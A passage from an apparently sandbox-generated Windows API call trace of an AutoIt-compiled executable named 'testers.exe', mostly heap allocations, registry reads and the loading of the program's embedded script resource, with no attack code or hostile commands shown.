Size=0x10) returned 0xbd3360 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe4068 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd3378 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe4078 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd3390 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5088 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd33a8 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe50b0 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd33c0 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe50c0 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd33d8 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe50d0 [0256.435] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd33f0 [0256.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe50e0 [0256.436] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0256.436] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0256.436] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0256.436] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0256.436] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0256.436] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0256.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd3408 [0256.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe50f0 [0256.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe54b0 [0256.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5100 [0256.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe54c8 [0256.436] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5110 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe54e0 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5120 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe54f8 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5130 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5510 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5140 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5528 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5150 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5540 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5160 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5558 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5170 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5570 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5180 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5190 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5588 [0256.437] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe51a0 [0256.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe55a0 [0256.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe51b0 [0256.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe55b8 [0256.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe51c0 [0256.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe55d0 [0256.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe51d0 [0256.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe55e8 [0256.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe51e0 [0256.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe51f0 [0256.438] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc11e [0256.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5600 [0256.438] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5200 [0256.439] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbd2288 [0256.439] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0256.439] OleInitialize (pvReserved=0x0) returned 0x0 [0256.470] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5618 [0256.470] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5220 [0256.470] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x7ffeac | out: phkResult=0x7ffeac*=0xf8) returned 0x0 [0256.471] RegQueryValueExW (in: hKey=0xf8, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x7ffec8, lpcbData=0x7ffeb0*=0x8 | out: lpType=0x0, lpData=0x7ffec8*=0x30, lpcbData=0x7ffeb0*=0x4) returned 0x0 [0256.471] RegCloseKey (hKey=0xf8) returned 0x0 [0256.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe6390 [0256.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5230 [0256.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5240 [0256.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5250 [0256.471] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5648 [0256.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5260 [0256.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe63b8 [0256.471] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5270 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5660 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5280 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5678 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5290 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5690 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe52a0 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe56a8 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe52b0 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe56c0 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe52c0 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe56d8 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe52d0 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe56f0 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe52e0 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5708 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe52f0 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5720 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5300 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5738 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5310 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5750 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5320 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5768 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5330 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5780 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5340 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5798 [0256.472] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5350 [0256.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe57b0 [0256.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5360 [0256.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe57c8 [0256.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5370 [0256.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe57e0 [0256.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5380 [0256.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe57f8 [0256.473] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5390 [0256.473] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.473] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5810 [0256.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53a0 [0256.477] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7dfe80, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0256.477] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x50) returned 0xbea578 [0256.477] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53b0 [0256.479] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x7cfe70, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0256.480] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe5810 | out: hHeap=0xbc0000) returned 1 [0256.480] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x50) returned 0xbea5d0 [0256.480] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea578 | out: hHeap=0xbc0000) returned 1 [0256.480] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe53b0 | out: hHeap=0xbc0000) returned 1 [0256.480] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x7dfe8c, lpFilePart=0x7efe8c | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x7efe8c*="testers.exe") returned 0x20 [0256.481] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe63e0 [0256.481] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5810 [0256.481] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5828 [0256.481] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53b0 [0256.481] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x7efea8 | out: phkResult=0x7efea8*=0x0) returned 0x2 [0256.481] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe5828 | out: hHeap=0xbc0000) returned 1 [0256.481] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe53b0 | out: hHeap=0xbc0000) returned 1 [0256.481] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.481] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.482] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.482] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5828 [0256.482] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53b0 [0256.482] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.482] IsThemeActive () returned 0x1 [0256.483] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x7ffecc, fWinIni=0x0 | out: pvParam=0x7ffecc) returned 1 [0256.483] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 1 [0256.483] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5840 [0256.483] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53c0 [0256.483] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x7efea0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0256.483] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5858 [0256.483] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53d0 [0256.483] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7cfe00, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0256.483] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x50) returned 0xbea578 [0256.483] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53e0 [0256.485] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x7bfdf0, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0256.485] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbd3348 | out: hHeap=0xbc0000) returned 1 [0256.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x50) returned 0xbea628 [0256.485] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea578 | out: hHeap=0xbc0000) returned 1 [0256.485] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe53e0 | out: hHeap=0xbc0000) returned 1 [0256.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbd22d0 [0256.485] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53e0 [0256.485] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0256.485] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0256.486] Wow64DisableWow64FsRedirection (in: OldValue=0x7dfe04 | out: OldValue=0x7dfe04*=0x0) returned 1 [0256.486] FreeLibrary (hLibModule=0x75990000) returned 1 [0256.486] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xbea578 [0256.486] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x7dfca0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0256.487] GetFileType (hFile=0xf8) returned 0x1 [0256.487] LoadLibraryExW (lpLibFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0256.488] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0256.488] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0256.488] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0256.488] FreeLibrary (hLibModule=0x75990000) returned 1 [0256.488] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10000) returned 0xbea680 [0256.489] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53f0 [0256.489] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x7dfe60 | out: ppstm=0x7dfe60*=0xbe6430) returned 0x0 [0256.490] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0256.490] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0256.490] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0256.490] LockResource (hResData=0x3607b8) returned 0x3607b8 [0256.490] ISequentialStream:RemoteWrite (in: This=0xbe6430, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0256.491] IStream:RemoteSeek (in: This=0xbe6430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0256.491] IStream:RemoteSeek (in: This=0xbe6430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0256.491] ISequentialStream:RemoteRead (in: This=0xbe6430, pv=0xbea680, cb=0x18, pcbRead=0x7dfd8c | out: pv=0xbea680*=0xa3, pcbRead=0x7dfd8c*=0x18) returned 0x0 [0256.491] IStream:RemoteSeek (in: This=0xbe6430, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0256.491] ISequentialStream:RemoteRead (in: This=0xbe6430, pv=0x7dfdd0, cb=0x4, pcbRead=0x7dfd8c | out: pv=0x7dfdd0*=0x45, pcbRead=0x7dfd8c*=0x4) returned 0x0 [0256.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe53f0 | out: hHeap=0xbc0000) returned 1 [0256.492] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea680 | out: hHeap=0xbc0000) returned 1 [0256.492] ISequentialStream:RemoteRead (in: This=0xbe6430, pv=0x7dfdf4, cb=0x10, pcbRead=0x7dfdcc | out: pv=0x7dfdf4*=0x4d, pcbRead=0x7dfdcc*=0x10) returned 0x0 [0256.492] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7dfcc8 | out: lpSystemTimeAsFileTime=0x7dfcc8*(dwLowDateTime=0x3a5d4580, dwHighDateTime=0x1d661be)) [0256.492] IStream:RemoteSeek (in: This=0xbe6430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0256.492] IStream:RemoteSeek (in: This=0xbe6430, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0256.492] ISequentialStream:RemoteRead (in: This=0xbe6430, pv=0x7df748, cb=0x4, pcbRead=0x7df50c | out: pv=0x7df748*=0x6b, pcbRead=0x7df50c*=0x4) returned 0x0 [0256.492] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7df408 | out: lpSystemTimeAsFileTime=0x7df408*(dwLowDateTime=0x3a5d6c90, dwHighDateTime=0x1d661be)) [0256.492] ISequentialStream:RemoteRead (in: This=0xbe6430, pv=0x7df750, cb=0x4, pcbRead=0x7df50c | out: pv=0x7df750*=0xa6, pcbRead=0x7df50c*=0x4) returned 0x0 [0256.492] ISequentialStream:RemoteRead (in: This=0xbe6430, pv=0x7df538, cb=0x34, pcbRead=0x7df50c | out: pv=0x7df538*=0xe1, pcbRead=0x7df50c*=0x34) returned 0x0 [0256.492] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7df408 | out: lpSystemTimeAsFileTime=0x7df408*(dwLowDateTime=0x3a5d6c90, dwHighDateTime=0x1d661be)) [0256.492] ISequentialStream:RemoteRead (in: This=0xbe6430, pv=0x7df750, cb=0x4, pcbRead=0x7df50c | out: pv=0x7df750*=0x17, pcbRead=0x7df50c*=0x4) returned 0x0 [0256.492] ISequentialStream:RemoteRead (in: This=0xbe6430, pv=0x7df77c, cb=0x6e, pcbRead=0x7df50c | out: pv=0x7df77c*=0xf9, pcbRead=0x7df50c*=0x6e) returned 0x0 [0256.492] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7df408 | out: lpSystemTimeAsFileTime=0x7df408*(dwLowDateTime=0x3a5d6c90, dwHighDateTime=0x1d661be)) [0256.492] ISequentialStream:RemoteRead (in: This=0xbe6430, pv=0x7dfe03, cb=0x1, pcbRead=0x7df754 | out: pv=0x7dfe03*=0x0, pcbRead=0x7df754*=0x1) returned 0x0 [0256.492] ISequentialStream:RemoteRead (in: This=0xbe6430, pv=0x7dfdfc, cb=0x4, pcbRead=0x7df754 | out: pv=0x7dfdfc*=0xbc, pcbRead=0x7df754*=0x4) returned 0x0 [0256.492] ISequentialStream:RemoteRead (in: This=0xbe6430, pv=0x7dfdfc, cb=0x4, pcbRead=0x7df754 | out: pv=0x7dfdfc*=0xbc, pcbRead=0x7df754*=0x4) returned 0x0 [0256.493] ISequentialStream:RemoteRead (in: This=0xbe6430, pv=0x7dfdfc, cb=0x4, pcbRead=0x7df754 | out: pv=0x7dfdfc*=0x84, pcbRead=0x7df754*=0x4) returned 0x0 [0256.493] IStream:RemoteSeek (in: This=0xbe6430, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0256.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xbe53f0 [0256.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xbe5400 [0256.493] ISequentialStream:RemoteRead (in: This=0xbe6430, pv=0xbe5400, cb=0x0, pcbRead=0x7df754 | out: pv=0xbe5400*=0x6e, pcbRead=0x7df754*=0x0) returned 0x0 [0256.493] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7df650 | out: lpSystemTimeAsFileTime=0x7df650*(dwLowDateTime=0x3a5d6c90, dwHighDateTime=0x1d661be)) [0256.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe53f0 | out: hHeap=0xbc0000) returned 1 [0256.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe5400 | out: hHeap=0xbc0000) returned 1 [0256.493] CloseHandle (hObject=0xf8) returned 1 [0256.493] IUnknown:Release (This=0xbe6430) returned 0x0 [0256.493] FreeLibrary (hLibModule=0x290000) returned 1 [0256.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbd22d0 | out: hHeap=0xbc0000) returned 1 [0256.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe53e0 | out: hHeap=0xbc0000) returned 1 [0256.493] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbd3318 | out: hHeap=0xbc0000) returned 1 [0256.493] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x50) returned 0xbea680 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd3318 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe6430 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53e0 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe6458 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd3348 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5400 [0256.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbd3348 | out: hHeap=0xbc0000) returned 1 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe64a8 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbd3348 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbe5870 [0256.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe6430 | out: hHeap=0xbc0000) returned 1 [0256.494] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe53e0 | out: hHeap=0xbc0000) returned 1 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea6f0 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53e0 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea708 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53f0 [0256.494] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbe6430 [0256.494] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea720 [0256.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe5410 [0256.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea738 [0256.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbea6f0 | out: hHeap=0xbc0000) returned 1 [0256.495] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbe53e0 | out: hHeap=0xbc0000) returned 1 [0256.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xbea6f0 [0256.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xbe53e0 [0256.495] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, 